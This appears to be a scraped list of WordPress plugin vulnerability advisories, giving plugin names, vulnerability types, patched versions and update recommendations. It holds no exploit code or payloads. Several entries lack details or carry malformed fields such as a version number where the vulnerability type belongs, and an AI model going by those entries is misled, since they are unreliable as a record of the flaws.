Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: xPinner Lite

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authenticated Email Injection
Patched Version: 4.6.0.4
Recommended Action: Update to version 4.6.0.4, or a newer patched version

Plugin: Elementor Addon Elements

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: ActiveCampaign for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.8
Recommended Action: Update to version 1.9.8, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Multiple Authenticated(Editor+) SQL Injection
Patched Version: 3.2.9
Recommended Action: Update to version 3.2.9, or a newer patched version

Plugin: Insert Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.7.5
Recommended Action: Update to version 3.7.5, or a newer patched version

Plugin: HTML5 jQuery Audio Player

Plugin: Download Monitor

Vulnerability: Authenticated (Admin+) Server-Side Request Forgery
Patched Version: 4.8.2
Recommended Action: Update to version 4.8.2, or a newer patched version

Plugin: AMP Toolbox

Plugin: WordPress project source code download

Vulnerability: Unauthenticated Backup Download
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Missing Authorization to Test Email
Patched Version: 4.2.3
Recommended Action: Update to version 4.2.3, or a newer patched version

Plugin: Headline Analyzer

Vulnerability: Missing Authorization via REST APIs
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Loginizer

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.4.0
Recommended Action: Update to version 1.4.0, or a newer patched version

Plugin: Contact Form DB

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.18
Recommended Action: Update to version 2.8.18, or a newer patched version

Plugin: WP ERP | Complete HR solution with recruitment & job listings | WooCommerce CRM & Accounting

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.12.4
Recommended Action: Update to version 1.12.4, or a newer patched version

Plugin: WebwinkelKeur: Webshop keurmerk & reviews for WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.25
Recommended Action: Update to version 3.25, or a newer patched version

Plugin: Tag Miner (Automatic Tag Extraction)

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Security Token Bypass via Type Juggling
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: WP OAuth Server (OAuth Authentication)

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.2.2
Recommended Action: Update to version 4.2.2, or a newer patched version

Plugin: Ad Injection

Plugin: WP User – Custom Registration Forms, Login and User Profile

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.0
Recommended Action: Update to version 7.0, or a newer patched version

Plugin: Contact Form Email

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: SQL Injection
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: Responsive Column Widgets

Vulnerability: Open Redirect via responsive_column_widgets_link
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Advanced Custom Fields Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.9.1
Recommended Action: Update to version 5.9.1, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.10.4
Recommended Action: Update to version 2.10.4, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.6
Recommended Action: Update to version 1.9.6, or a newer patched version

Plugin: Smartkit

Plugin: WordPress Membership SwiftCloud.io

Plugin: Yellow Yard Searchbar

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.12
Recommended Action: Update to version 2.8.12, or a newer patched version

Plugin: IDB Ecommerce (wpStoreCart 5)

Vulnerability: Arbitrary File Upload
Patched Version: 2.5.30
Recommended Action: Update to version 2.5.30, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Admin+ SQL Injection
Patched Version: 5.9.8
Recommended Action: Update to version 5.9.8, or a newer patched version

Plugin: Coupon Affiliates – Affiliate Plugin for WooCommerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 5.4.4
Recommended Action: Update to version 5.4.4, or a newer patched version

Plugin: WPtouch – Make your WordPress Website Mobile-Friendly

Vulnerability: Open Redirect
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 7.4.38.727
Recommended Action: Update to version 7.4.38.727, or a newer patched version

Plugin: Google Authenticator – WordPress 2FA, OTP SMS and Email

Vulnerability: Sensitive Data Exposure of Multifactor Backup Codes
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: Professional Social Sharing Buttons, Icons & Related Posts – Shareaholic

Vulnerability: Authenticated (Subscriber+) Cross-Site Scripting
Patched Version: 7.6.1.0
Recommended Action: Update to version 7.6.1.0, or a newer patched version

Plugin: Orders Tracking for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.10
Recommended Action: Update to version 1.1.10, or a newer patched version

Plugin: Highcompress Image Compressor

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: Secure Admin IP

Vulnerability: Missing Authorization via ‘saveSettings’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Authenticated (Administrator+) Directory Traversal
Patched Version: 1.8.15
Recommended Action: Update to version 1.8.15, or a newer patched version

Plugin: S3 Bubble Amazon S3 HTML5 Video with Adverts

Vulnerability: Directory Traversal to Arbitrary File Access
Patched Version: 0.8
Recommended Action: Update to version 0.8, or a newer patched version

Plugin: WP Travel Engine – Tour Booking Plugin – Tour Operator Software

Vulnerability: Editor+ Stored Cross-Site Scripting
Patched Version: 5.3.1
Recommended Action: Update to version 5.3.1, or a newer patched version

Plugin: Gift Cards (Gift Vouchers and Packages) (WooCommerce Supported)

Vulnerability: Unauthenticated SQL Injection
Patched Version: 4.3.3
Recommended Action: Update to version 4.3.3, or a newer patched version

Plugin: WordPress OpenID Connect Client

Vulnerability: Authentication Bypass
Patched Version: 2.1.8
Recommended Action: Update to version 2.1.8, or a newer patched version

Plugin: WPify Woo Czech

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.5.7
Recommended Action: Update to version 3.5.7, or a newer patched version

Plugin: Mobile Call Now & Map Buttons

Plugin: Mediamatic – Media Library Folders

Vulnerability: SQL Injection
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: ImageMapper

Vulnerability: Cross-Site Request Forgery to Plugin Settings Change via ajax
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Footer Text

Plugin: Booster for WooCommerce

Vulnerability: Authenticated (Subscriber+) Information Disclosure via Shortcode
Patched Version: 7.1.2
Recommended Action: Update to version 7.1.2, or a newer patched version

Plugin: WP Symposium

Vulnerability: Authenticated SQL Injection
Patched Version: 14.11
Recommended Action: Update to version 14.11, or a newer patched version

Plugin: Ivory Search – WordPress Search Plugin

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.4.7
Recommended Action: Update to version 5.4.7, or a newer patched version

Plugin: Simple Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Photo Gallery, Sliders, Proofing and Themes – NextGEN Gallery

Vulnerability: Authenticated (Admininistrator+) Arbitrary File Read and Deletion in gallery_edit
Patched Version: 3.39
Recommended Action: Update to version 3.39, or a newer patched version

Plugin: FlatPM – Ad Manager, AdSense and Custom Code

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.662
Recommended Action: Update to version 2.662, or a newer patched version

Plugin: Media Library Assistant

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 3.12
Recommended Action: Update to version 3.12, or a newer patched version

Plugin: Gmedia Photo Gallery

Vulnerability: Denial of Service
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Modification
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: Woocommerce Follow-ups

Vulnerability: Authenticated Arbitrary File Upload in Template Editing
Patched Version: 4.9.50
Recommended Action: Update to version 4.9.50, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via ‘wpfc_pause_cdn_integration_ajax_request_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: Conditional Fields for Contact Form 7

Vulnerability: Missing Authorization
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Flo Forms – Easy Drag & Drop Form Builder

Vulnerability: Options Change to Stored Cross-Site Scripting
Patched Version: 1.0.36
Recommended Action: Update to version 1.0.36, or a newer patched version

Plugin: Checkout Field Editor (Checkout Manager) for WooCommerce

Vulnerability: Authenticated (Admin+) PHP Object Injection
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: WTI Like Post

Vulnerability: SQL Injection
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: jQuery Reply to Comment

Plugin: Ultimate FAQ Accordion Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.22
Recommended Action: Update to version 1.8.22, or a newer patched version

Plugin: Smart YouTube PRO

Vulnerability: Cross-Site Request Forgery via handle_colorbox_options
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bootstrap Shortcodes

Plugin: Akismet Privacy Policies

Plugin: Fattura24

Vulnerability: Reflected Cross-Site Scripting via ‘id’
Patched Version: 6.2.8
Recommended Action: Update to version 6.2.8, or a newer patched version

Core: WordPress

Vulnerability: Missing Authorization
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Leyka

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.30
Recommended Action: Update to version 3.30, or a newer patched version

Plugin: sexybookmarks

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.1.5.0
Recommended Action: Update to version 6.1.5.0, or a newer patched version

Plugin: MashShare – Social Media Share Buttons, Social Share Icons

Vulnerability: Information Disclosure
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WP Floating Menu – One page navigator, sticky menu for WordPress

Vulnerability: Cross-Site Scripting via id Parameter
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Admin Font Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: ActivityPub

Vulnerability: Authenticated (Subscriber+) Insecure Direct Object Reference to Sensitive Post Content Exposure
Patched Version: 1.0.0
Recommended Action: Update to version 1.0.0, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: PDF Invoices & Packing Slips for WooCommerce

Vulnerability: 3.0.0
Patched Version: 3.0.1
Recommended Action: Update to version 3.0.1, or a newer patched version

Plugin: Onepage Builder – Easiest Landing Page Builder For WordPress

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: Cross-Site Request Forgery via delete_expired_used_coupon_code
Patched Version: 5.14.2
Recommended Action: Update to version 5.14.2, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites

Vulnerability: Information Disclosure via Back-Up Files
Patched Version: 4.4.1.2
Recommended Action: Update to version 4.4.1.2, or a newer patched version

Plugin: WP EasyPay – Create Your Payment Forms to Pay with Square – Square for WordPress Plugin: Integrate Square with WordPress to Collect Payments

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: WP Taxonomy Import

Plugin: Article Directory

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘publish_terms_text’
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Htaccess by BestWebSoft – WordPress Website Access Control Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Woopra Analytics Plugin

Vulnerability: Remote Code Execution
Patched Version: 1.4.3.2
Recommended Action: Update to version 1.4.3.2, or a newer patched version

Plugin: Extra User Details

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 0.5.1
Recommended Action: Update to version 0.5.1, or a newer patched version

Plugin: Eshop Magic

Vulnerability: Arbitrary File Read
Patched Version: 0.2
Recommended Action: Update to version 0.2, or a newer patched version

Plugin: RSS for Yandex Turbo

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 1.31
Recommended Action: Update to version 1.31, or a newer patched version

Plugin: OAuth Single Sign On – SSO (OAuth Client)

Vulnerability: No subtitle
Patched Version: 6.24.2
Recommended Action: Update to version 6.24.2, or a newer patched version

Plugin: LetsRecover – WooCommerce Abandoned Cart Notifications

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: CommonsBooking

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: Visual Form Builder

Vulnerability: Cross-Site Request Forgery to Data Modification
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: WooCommerce Brands

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.50
Recommended Action: Update to version 1.6.50, or a newer patched version

Plugin: Images to WebP

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: WP Sticky Social

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: WordPress Share Buttons Plugin – AddThis

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: Font Awesome Integration

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 7.4.6
Recommended Action: Update to version 7.4.6, or a newer patched version

Plugin: WP-DownloadManager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.68.7
Recommended Action: Update to version 1.68.7, or a newer patched version

Plugin: GDPR CCPA Compliance & Cookie Consent Banner

Vulnerability: PHP Object Injection
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: amtyThumb posts

Plugin: W3 Total Cache

Vulnerability: Information Exposure
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Survey Maker

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: Clipta Video Informer

Plugin: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More

Vulnerability: Authenticated (Administrator+) Arbitrary File Access via Path Traversal
Patched Version: 1.7.5.5
Recommended Action: Update to version 1.7.5.5, or a newer patched version

Plugin: WPB Advanced FAQ

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Donation Button

Plugin: Gallery Factory Lite

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WordPress WP-Advanced-Search

Vulnerability: Cross-Site Request Forgery leading to Plugin Settings Updates
Patched Version: 3.3.9
Recommended Action: Update to version 3.3.9, or a newer patched version

Plugin: User Private Files – File Upload & Download Manager with Secure File Sharing

Vulnerability: Missing Authorization
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version

Plugin: Discounts Manager for Products

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: PHP Everywhere

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: MainWP Code Snippets Extension

Vulnerability: Authenticated (Subscriber+) PHP Code Injection
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Request Forgery via give_ajax_delete_payment_note
Patched Version: 2.25.3
Recommended Action: Update to version 2.25.3, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.33
Recommended Action: Update to version 2.0.33, or a newer patched version

Plugin: User Profile Builder – Beautiful User Registration Forms, User Profiles & User Role Editor

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Chamber Dashboard Business Directory

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.1
Recommended Action: Update to version 3.3.1, or a newer patched version

Plugin: WishSuite – Wishlist for WooCommerce

Vulnerability: Cross-Site Request Forgery via plugin_activation()
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Monsters Editor for WP Super Edit

Plugin: ravpage

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.18
Recommended Action: Update to version 2.18, or a newer patched version

Plugin: Ultimate Product Catalog

Vulnerability: Arbitrary File Upload
Patched Version: 4.2.22
Recommended Action: Update to version 4.2.22, or a newer patched version

Plugin: Encrypted Blog

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.0.6.6
Recommended Action: Update to version 0.0.6.6, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.6
Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WS Form LITE – Drag & Drop Contact Form Builder for WordPress

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 1.9.171
Recommended Action: Update to version 1.9.171, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: Cookie Params

Vulnerability: Reflected Cross-Site Scripting and Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: Authenticated(Editor+) SQL Injection
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: cformsII

Vulnerability: Cross-Site Scripting
Patched Version: 11.6.1
Recommended Action: Update to version 11.6.1, or a newer patched version

Plugin: Echo Sign

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Fast Image Adder

Vulnerability: Arbitrary File Upload
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Animate It!

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Ultimate Form Builder <= 8.4.3
Patched Version: 8.4.4
Recommended Action: Update to version 8.4.4, or a newer patched version

Plugin: AutomateWoo

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.7.6
Recommended Action: Update to version 5.7.6, or a newer patched version

Plugin: teachPress

Vulnerability: Reflected Cross-Site Scripting via meta_field_id and cite_id
Patched Version: 9.0.3
Recommended Action: Update to version 9.0.3, or a newer patched version

Plugin: ApplyOnline – Application Form Builder and Manager

Vulnerability: Missing Authorization
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: Vimeo Video Autoplay Automute

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GREYD.SUITE

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Social Sharing Plugin – Social Warfare

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary File Deletion
Patched Version: 3.7.19
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.19, 3.8.19, 3.9.17, 4.0.16, 4.1.16, 4.2.13, 4.3.9, 4.4.8, 4.5.7, 4.6.4, 4.7.3

Plugin: Get Use APIs – JSON Content Importer

Vulnerability: Authenticated (Admin+) Cross Site Scripting
Patched Version: 1.3.16
Recommended Action: Update to version 1.3.16, or a newer patched version

Plugin: Traffic Analyzer

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Profile Builder Pro

Vulnerability: Authenticated (Subscriber+) Time-Based One-Time Password Sensitive Information Exposure
Patched Version: 3.10.1
Recommended Action: Update to version 3.10.1, or a newer patched version

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: WOLF – WordPress Posts Bulk Editor and Manager Professional

Vulnerability: Cross-Site Request Forgery via wpbe_update_page_field
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: WP Sticky Button – Click to Chat

Vulnerability: Missing Authorization to Arbitrary Settings Update
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: supportezzy

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: RokIntroScroller

Vulnerability: Abuse of Functionality
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Authenticated Settings Modification, Configuration Disclosure, and User Data Export
Patched Version: 3.64.1
Recommended Action: Update to version 3.64.1, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: WP-FormAssembly

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Slideoptinprox

Plugin: iframe Shortcode

Plugin: Awesome Filterable Portfolio

Vulnerability: Blind SQL Injection
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Tom M8te

Plugin: JobCareer | Job Board Responsive WordPress Theme

Vulnerability: User Enumeration
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Captcha

Vulnerability: Captcha Bypass
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.9.149
Recommended Action: Update to version 1.9.9.149, or a newer patched version

Plugin: JVM Gutenberg Rich Text Icons

Vulnerability: Directory Traversal to Authenticated(Subscriber+) Arbitrary File Deletion
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Five Star Restaurant Reservations – WordPress Booking Plugin

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 2.4.8
Recommended Action: Update to version 2.4.8, or a newer patched version

Plugin: Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More

Vulnerability: Store Exporter <= 2.3.1
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Cryptocurrency Widgets Pack

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Enhanced Ecommerce Google Analytics for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: AI Engine

Vulnerability: Unauthenticated Arbitrary File Upload via rest_upload
Patched Version: 1.9.99
Recommended Action: Update to version 1.9.99, or a newer patched version

Plugin: Jock On Air Now

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: VDZ CallBack Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.14.6
Recommended Action: Update to version 1.14.6, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Race Condition to Multiple Poll Voting
Patched Version: 1.24.1
Recommended Action: Update to version 1.24.1, or a newer patched version

Plugin: WordPress Email Marketing Plugin – WP Email Capture

Vulnerability: Missing Authorization to Email Capture List Download
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.5.17
Recommended Action: Update to version 2.5.17, or a newer patched version

Plugin: WP-reCAPTCHA

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Publish to Schedule

Vulnerability: Cross-Site Request Forgery leading to Plugin Option Changes
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Support Board

Vulnerability: Agent+ Stored Cross-Site Scripting
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.5.7
Recommended Action: Update to version 5.5.7, or a newer patched version

Plugin: Mega Addons For WPBakery Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: MainWP Google Analytics Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: Mega Main Menu

Plugin: Ketchup Restaurant Reservations

Plugin: EmbedStories – Display social media stories

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.7.5
Recommended Action: Update to version 0.7.5, or a newer patched version

Plugin: amr ical events lists

Plugin: Paymattic – Secure, Simple Payment & Donation with Subscription Payments, Recurring Donations, Customer Management

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Gutenberg Blocks with AI by Kadence WP – Page Builder Features

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.1.11
Recommended Action: Update to version 3.1.11, or a newer patched version

Plugin: Pagination by BestWebSoft – Customizable WordPress Content Splitter and Navigation Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: WooCommerce Subscription

